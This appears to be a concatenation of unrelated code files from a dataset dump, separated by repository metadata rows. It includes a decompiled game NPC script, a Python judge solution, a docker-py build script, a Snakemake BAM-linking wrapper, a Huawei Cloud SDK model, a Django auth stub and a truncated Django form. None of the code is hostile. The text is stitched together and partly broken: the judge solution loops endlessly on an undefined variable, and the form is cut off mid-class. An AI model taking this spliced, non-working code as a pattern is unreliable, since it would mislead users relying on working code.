DeclNpc(
X = 8000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 14,
ChipIndex = 0xE,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 15,
ChipIndex = 0xF,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 16,
ChipIndex = 0x10,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 8,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 20,
ChipIndex = 0x14,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 21,
ChipIndex = 0x15,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 22,
ChipIndex = 0x16,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 23,
ChipIndex = 0x17,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 24,
ChipIndex = 0x18,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 25,
ChipIndex = 0x19,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 26,
ChipIndex = 0x1A,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 9,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 30,
ChipIndex = 0x1E,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 31,
ChipIndex = 0x1F,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 32,
ChipIndex = 0x20,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 33,
ChipIndex = 0x21,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 34,
ChipIndex = 0x22,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 35,
ChipIndex = 0x23,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 36,
ChipIndex = 0x24,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 11,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
ScpFunction(
"Function_0_56A", # 00, 0
"Function_1_56B", # 01, 1
"Function_2_56C", # 02, 2
"Function_3_582", # 03, 3
"Function_4_598", # 04, 4
"Function_5_5B3", # 05, 5
"Function_6_5CE", # 06, 6
"Function_7_61B", # 07, 7
"Function_8_6D7", # 08, 8
"Function_9_793", # 09, 9
"Function_10_84F", # 0A, 10
"Function_11_865", # 0B, 11
"Function_12_921", # 0C, 12
)
def Function_0_56A(): pass
label("Function_0_56A")
Return()
# Function_0_56A end
def Function_1_56B(): pass
label("Function_1_56B")
Return()
# Function_1_56B end
def Function_2_56C(): pass
label("Function_2_56C")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_581")
OP_99(0xFE, 0x0, 0x7, 0x640)
Jump("Function_2_56C")
label("loc_581")
Return()
# Function_2_56C end
def Function_3_582(): pass
label("Function_3_582")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_597")
OP_99(0xFE, 0x0, 0x7, 0x7D0)
Jump("Function_3_582")
label("loc_597")
Return()
# Function_3_582 end
def Function_4_598(): pass
label("Function_4_598")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_5B2")
OP_99(0xFE, 0x0, 0x0, 0x5DC)
Sleep(500)
Jump("Function_4_598")
label("loc_5B2")
Return()
# Function_4_598 end
def Function_5_5B3(): pass
label("Function_5_5B3")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_5CD")
OP_99(0xFE, 0x0, 0x3, 0x3E8)
Sleep(500)
Jump("Function_5_5B3")
label("loc_5CD")
Return()
# Function_5_5B3 end
def Function_6_5CE(): pass
label("Function_6_5CE")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_61A")
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
Jump("Function_6_5CE")
label("loc_61A")
Return()
# Function_6_5CE end
def Function_7_61B(): pass
label("Function_7_61B")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_6D6")
SetChrChipByIndex(0xFE, 5)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 6)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_7_61B")
label("loc_6D6")
Return()
# Function_7_61B end
def Function_8_6D7(): pass
label("Function_8_6D7")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_792")
SetChrChipByIndex(0xFE, 15)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 16)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_8_6D7")
label("loc_792")
Return()
# Function_8_6D7 end
def Function_9_793(): pass
label("Function_9_793")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_84E")
SetChrChipByIndex(0xFE, 25)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 26)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_9_793")
label("loc_84E")
Return()
# Function_9_793 end
def Function_10_84F(): pass
label("Function_10_84F")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_864")
OP_99(0xFE, 0x0, 0x7, 0x640)
Jump("Function_10_84F")
label("loc_864")
Return()
# Function_10_84F end
def Function_11_865(): pass
label("Function_11_865")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_920")
SetChrChipByIndex(0xFE, 35)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 36)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_11_865")
label("loc_920")
Return()
# Function_11_865 end
def Function_12_921(): pass
label("Function_12_921")
TalkBegin(0xFE)
ChrTalk( #0
0xFE,
"你好。\x02",
)
Jump("loc_93A")
label("loc_93A")
CloseMessageWindow()
TalkEnd(0xFE)
Return()
# Function_12_921 end
SaveToFile()
Try(main)
| [
"[email protected]"
] | |
be6a016ce6c16fe2faa6e74c48ad6571cc088641 | b33ddc7b89d05e19fdeb69593872fd174fab9f4f | /URI-py/2875.py | 49dc31d7091f31bea192a97075a7c40e9e9f21a3 | [] | no_license | ThiagoCComelli/URI-Online-Judge | 8b8d609d880342b39ba0d396c0610ecb7e01a5af | 5348f736b2d683f4b857232c22cccb7c1d8b8d65 | refs/heads/master | 2020-07-23T15:14:05.353948 | 2020-03-10T19:42:12 | 2020-03-10T19:42:12 | 207,606,956 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | # -*- coding: utf-8 -*-
# Read test cases until EOF (standard URI Online Judge input pattern).
while True:
    try:
        # Matrix dimensions for this test case: n rows, m columns.
        n,m = map(int, input().split())
        lista = []
        lista1= []
        # Read the n rows; each row is kept as a list of whitespace-split
        # tokens.
        for i in range(n):
            lista.append(input().split())
        # NOTE(review): the solution looks unfinished -- this inner loop has
        # no break/return so it can never reach the next test case, and
        # `a =a` raises NameError because `a` is never assigned anywhere in
        # the script.
        while True:
            for i in range(n):
                for j in range(m):
                    a =a
    except EOFError:
        break
"[email protected]"
] | |
0a1abc1df723114b5f626549217071f99ce3f6d6 | 1dce03e6f3f5b23d1e5c599678624638943b9422 | /docker/create_docker_images2.py | c963255960a9c9025948e08941e44f9ffe9c6e2f | [] | no_license | volat1977/byte_of_python | 76ec958bdc51c7538bb24e5d152b456feab603ca | 60b58ca3927ef5e2801c93dd676d5f8b4c03d9fc | refs/heads/master | 2020-12-26T07:23:10.562537 | 2020-03-24T05:31:03 | 2020-03-24T05:31:03 | 237,431,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | from io import BytesIO
import docker
# In-memory build context: a single Dockerfile passed via `fileobj`, so no
# directory context or tarball is needed.
dockerfile = '''
# Shared Volume
FROM busybox:buildroot-2014.02
VOLUME /data
CMD ["/bin/sh"]
'''

f = BytesIO(dockerfile.encode('utf-8'))
cli = docker.from_env()

# decode=True makes the low-level build API yield parsed dicts instead of
# raw JSON byte chunks.
response = cli.api.build(fileobj=f, rm=True, tag='test3', decode=True)

# Print build progress and surface build errors.  (The previous, commented
# out attempts used `line.keys()[0]`, which fails on Python 3 where dict
# views are not indexable; membership tests work on both versions.)
for line in response:
    for key in ('stream', 'error'):
        if key in line:
            value = line[key].strip()
            if value:
                print(value)
"[email protected]"
] | |
d753d0c4da9bb638deab2a12cfdd73f9e4680cb5 | bac7a7507933ac5bb38b41bbe2a587764da3cf94 | /snappy_wrappers/wrappers/link_in_bam/wrapper.py | 09790324734c2213f0b8a7b3f82af6b18a1c8997 | [
"MIT"
] | permissive | Pregelnuss/snappy-pipeline | 923b0f36117a2f55ee52f9a8564ed3bb82a8be16 | 31200eba84bff8e459e9e210d6d95e2984627f5c | refs/heads/master | 2023-06-19T07:24:04.736033 | 2021-05-27T07:24:05 | 2021-05-27T07:24:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,063 | py | # -*- coding: utf-8 -*-
"""CUBI+Snakemake wrapper code for external: Snakemake wrapper.py
"""
from snakemake import shell
__author__ = "Oliver Stolpe <[email protected]>"
# All wrapper work happens in one bash script; failures in any command abort
# the rule because bash is run by snakemake with strict options.
shell.executable("/bin/bash")
# Path of this wrapper file; copied next to the log below for reproducibility.
this_file = __file__
# NOTE(review): `input` shadows the Python builtin; it is the external BAM
# path injected by the snakemake rule (snakemake.params.args["input"]).
input = snakemake.params.args["input"]
if not input:
    raise Exception("No bam found")
# The r-string below is a bash template; {…} placeholders are filled in by
# snakemake's shell() formatting.  It links the external BAM into place,
# indexes it if needed, and produces samtools QC reports plus MD5 sums.
shell(
    r"""
set -x

# Write out information about conda installation.
conda list >{snakemake.log.conda_list}
conda info >{snakemake.log.conda_info}

# Also pipe stderr to log file
if [[ -n "{snakemake.log.log}" ]]; then
    if [[ "$(set +e; tty; set -e)" != "" ]]; then
        rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
        exec 2> >(tee -a "{snakemake.log.log}" >&2)
    else
        rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
        echo "No tty, logging disabled" >"{snakemake.log.log}"
    fi
fi

# Setup auto-cleaned TMPDIR
export TMPDIR=$(mktemp -d)
trap "rm -rf $TMPDIR" EXIT
mkdir -p $TMPDIR/tmp.d

# Link in bam files with the proper file name scheme
ln -sr {input} {snakemake.output.bam}

# Link in resultin BAM file or create index
if [[ -e {input}.bai ]]; then
    ln -sr {input}.bai {snakemake.output.bam_bai}
else
    samtools index {snakemake.output.bam}
fi

# Build MD5 files
pushd $(dirname {snakemake.output.bam})
md5sum $(basename {snakemake.output.bam}) > $(basename {snakemake.output.bam}).md5
md5sum $(basename {snakemake.output.bam_bai}) > $(basename {snakemake.output.bam_bai}).md5
popd

# QC Report ---------------------------------------------------------------------------------------

# gather statistics from BAM file
# TODO: use pipes for only reading once from disk?
samtools stats    {snakemake.output.bam} > {snakemake.output.report_bamstats_txt}
samtools flagstat {snakemake.output.bam} > {snakemake.output.report_flagstats_txt}
samtools idxstats {snakemake.output.bam} > {snakemake.output.report_idxstats_txt}

# call plot-bamstats
mkdir $TMPDIR/bamstats.d
plot-bamstats \
    -p $TMPDIR/bamstats.d/ \
    {snakemake.output.report_bamstats_txt} \
|| true  # ignore failure

# Convert HTML report into one file.
inline-html \
    --in-file $TMPDIR/bamstats.d/index.html \
    --out-file {snakemake.output.report_bamstats_html} \
|| touch {snakemake.output.report_bamstats_html}

# Build MD5 files for the reports
md5sum {snakemake.output.report_bamstats_html} > {snakemake.output.report_bamstats_html_md5}
md5sum {snakemake.output.report_bamstats_txt} > {snakemake.output.report_bamstats_txt_md5}
md5sum {snakemake.output.report_flagstats_txt} >{snakemake.output.report_flagstats_txt_md5}
md5sum {snakemake.output.report_idxstats_txt} > {snakemake.output.report_idxstats_txt_md5}

# Additional logging for transparency & reproducibility
# Logging: Save a copy this wrapper (with the pickle details in the header)
cp {this_file} $(dirname {snakemake.log.log})/wrapper.py

# Logging: Save a permanent copy of the environment file used
cp $(dirname {this_file})/environment.yaml $(dirname {snakemake.log.log})/environment_wrapper.yaml
"""
)
| [
"[email protected]"
] | |
e61d9c8b65dd2e6ddb62065629685896f512ffb7 | 0fe37e11df976c55fe5bbe492879b7cd8a95b7c5 | /1_2_python变量_输出和输入_数字_字符串/04_str_test.py | 3444adc19895857e5d4fee8cb2347e41708b2bfb | [] | no_license | 1286211699/mmc_code | 9bb7761107604b445dea4fe5acf9d503fbc28dfa | ee97879632dfd7d24c604f7db52c82fa29109daa | refs/heads/master | 2022-12-08T23:19:06.382825 | 2020-05-08T13:59:46 | 2020-05-08T13:59:46 | 177,100,815 | 2 | 0 | null | 2022-12-08T01:42:47 | 2019-03-22T08:25:37 | HTML | UTF-8 | Python | false | false | 1,896 | py |
# name = 'for'
#
# name = "for's name is for"
# print(name)
# print('abcd\tefg')
# print('My name is %s'%('for'))
# print('I am %d years old'%(18))
# print('his height is %f m'%(1.78))
# print('his height is %.2f m'%(1.78))
# name = 'while'
#
# print(name[1:3])
# str_test = 'hello world world'
#
# print(str_test.partition('o'))
# print(str_test.rpartition('o'))
# my_str = 'hello:world:python '
# print(my_str)
# print(my_str.replace('l','w'))
# # print(my_str.splitlines())
# # print(my_str.split(':'))
# print(str_test.count('l'))
#
# print(str_test.find('w'))
#
# print(str_test.rfind('w'))
#
# print(str_test.index('o'))
# print(str_test.rindex('o'))
# print(str_test[::-1])
# print(str_test[::-2])
#
# print(str_test[1:9:-1])
# print(str_test[9:1:-1])
# print(str_test[0:7])
#
# print(str_test[:7])
#
# print(str_test[2:])
#
# print(str_test[:])
# print(str_test[::2])
# print(str_test[0:7:2])
# str_test = ' for '
# print(str_test.strip())#在以后的数据清洗中战友很大的比重
# print(str_test.rstrip())
# print(str_test.lstrip())
# print(str_test.center(10,'x'))
# print(str_test.ljust(10,'x'))
# print(str_test.rjust(10,'x'))
# print(str_test.zfill(10))
#
# python = '{} is {}'
#
# print(python.format('for','cool'))
#
# print('hello'.upper())
# print('HELLO'.lower())
#
# print('12345a'.isalnum())
# print('abcdef'.isalpha())
# print('12345'.isdigit())
# print('HELLO'.isupper())
# print('hello'.islower())
# print(' '.isspace())
#
# print('for is cool'[3:].startswith(' '))
# print('for is cool'[3:].endswith('cool'))
# print(ord('a'))
# print(chr(97))
# Demonstrate round-tripping a Chinese string through two encodings.
u = '学神'

# GBK encoding (2 bytes per CJK character).  The original encoded with the
# UTF-8 default here and then decoded with 'gbk' below, which produces
# mojibake; the codec used to decode must match the one used to encode.
str1 = u.encode('gbk')
print(str1)

# UTF-8 encoding (3 bytes per CJK character); spelled out explicitly even
# though it is the default, for symmetry with the decode below.
str2 = u.encode('utf-8')
print(str2)

# Decode each byte string with the codec that produced it.
u1 = str1.decode('gbk')
print(u1)

u2 = str2.decode('utf-8')
print(u2)
| [
"[email protected]"
] | |
404ccc4de81309e69083b0b19bb3d53830a09a20 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-gaussdbfornosql/huaweicloudsdkgaussdbfornosql/v3/model/list_instances_datastore_result.py | 34f5b1f20917eabd5ea29c17543d8217b496429f | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,366 | py | # coding: utf-8
import re
import six
class ListInstancesDatastoreResult:
    """Datastore (database engine + version) entry of an instance listing.

    Attributes:
        openapi_types (dict): The key is attribute name
                            and the value is attribute type.
        attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute names whose values are masked as "****" by to_dict().
    sensitive_list = []

    openapi_types = {
        'type': 'str',
        'version': 'str'
    }

    attribute_map = {
        'type': 'type',
        'version': 'version'
    }

    def __init__(self, type=None, version=None):
        """ListInstancesDatastoreResult - a model defined in huaweicloud sdk.

        :param type: database engine name
        :param version: database engine version
        """
        self._type = None
        self._version = None
        self.discriminator = None
        self.type = type
        self.version = version

    @property
    def type(self):
        """Database engine name.

        :return: The type of this ListInstancesDatastoreResult.
        :rtype: str
        """
        return self._type

    @type.setter
    def type(self, type):
        """Set the database engine name.

        :param type: The type of this ListInstancesDatastoreResult.
        :type: str
        """
        self._type = type

    @property
    def version(self):
        """Database engine version.

        :return: The version of this ListInstancesDatastoreResult.
        :rtype: str
        """
        return self._version

    @version.setter
    def version(self, version):
        """Set the database engine version.

        :param version: The version of this ListInstancesDatastoreResult.
        :type: str
        """
        self._version = version

    def to_dict(self):
        """Return the model's properties as a plain dict.

        Nested models are serialised recursively through their own
        ``to_dict``; attributes listed in ``sensitive_list`` are masked.
        """
        result = {}
        # Plain dict views and comprehensions replace the former
        # six.iteritems/map/lambda combination; behaviour is unchanged.
        for attr in self.openapi_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    k: v.to_dict() if hasattr(v, "to_dict") else v
                    for k, v in value.items()
                }
            else:
                result[attr] = "****" if attr in self.sensitive_list else value
        return result

    def to_str(self):
        """Return the JSON string representation of the model."""
        import simplejson as json
        return json.dumps(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Return True if both objects are models with equal state."""
        if not isinstance(other, ListInstancesDatastoreResult):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Return True if the objects differ."""
        return not self == other
| [
"[email protected]"
] | |
3c061683d05e01d2e49fdf44a9642b8ba3230d38 | 7942342d457276bb266228d0236af647b3d55477 | /django/contrib/auth/__init__.pyi | 24b49bc00c2f2782b020918d77e8d81ac3a388da | [
"MIT"
] | permissive | AsymmetricVentures/mypy-django | 847c4e521ce4dec9a10a1574f9c32b234dafd00b | f6e489f5cf5672ecede323132665ccc6306f50b8 | refs/heads/master | 2020-06-30T01:53:44.434394 | 2016-12-22T22:45:50 | 2016-12-22T22:45:50 | 74,397,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | pyi | # Stubs for django.contrib.auth (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any, Optional
from django.apps import apps as django_apps
from .signals import user_logged_in as user_logged_in, user_logged_out as user_logged_out, user_login_failed as user_login_failed
# Session keys under which django stores auth state for a logged-in user.
SESSION_KEY = ... # type: str
BACKEND_SESSION_KEY = ... # type: str
HASH_SESSION_KEY = ... # type: str
# Query-string parameter carrying the post-login redirect target.
REDIRECT_FIELD_NAME = ... # type: str
# NOTE(review): stubgen left these signatures untyped; precise argument and
# return types would have to be taken from the django source, so only
# comments are added here.
def load_backend(path): ...
def get_backends(): ...
def authenticate(**credentials): ...
def login(request, user, backend: Optional[Any] = ...): ...
def logout(request): ...
def get_user_model(): ...
def get_user(request): ...
def get_permission_codename(action, opts): ...
def update_session_auth_hash(request, user): ...
default_app_config = ... # type: str
| [
"[email protected]"
] | |
0405898d24af93f463de789847b0398a0e8e0b97 | 092d82f8a64f8e33a739ae023667253a75bfb9ae | /jury/forms.py | ac08bc91b6d6b266345bc9fb2f865acbf50bba23 | [
"MIT"
] | permissive | COdingaorg/The_Jury | 8c103eec028891b1ee98ede786fb54638bd16ba6 | a4432269a023edf49a010644ca4f06324a934d7f | refs/heads/main | 2023-06-18T10:43:14.888503 | 2021-07-20T16:05:59 | 2021-07-20T16:05:59 | 386,658,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | from jury.models import UserProfile, UserProject
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class registerUser(UserCreationForm):
    """Sign-up form: django's UserCreationForm plus name and e-mail fields.

    NOTE(review): the class name breaks PEP 8 PascalCase ("RegisterUser");
    renaming would break existing imports, so it is only flagged here.
    """
    class Meta:
        model = User
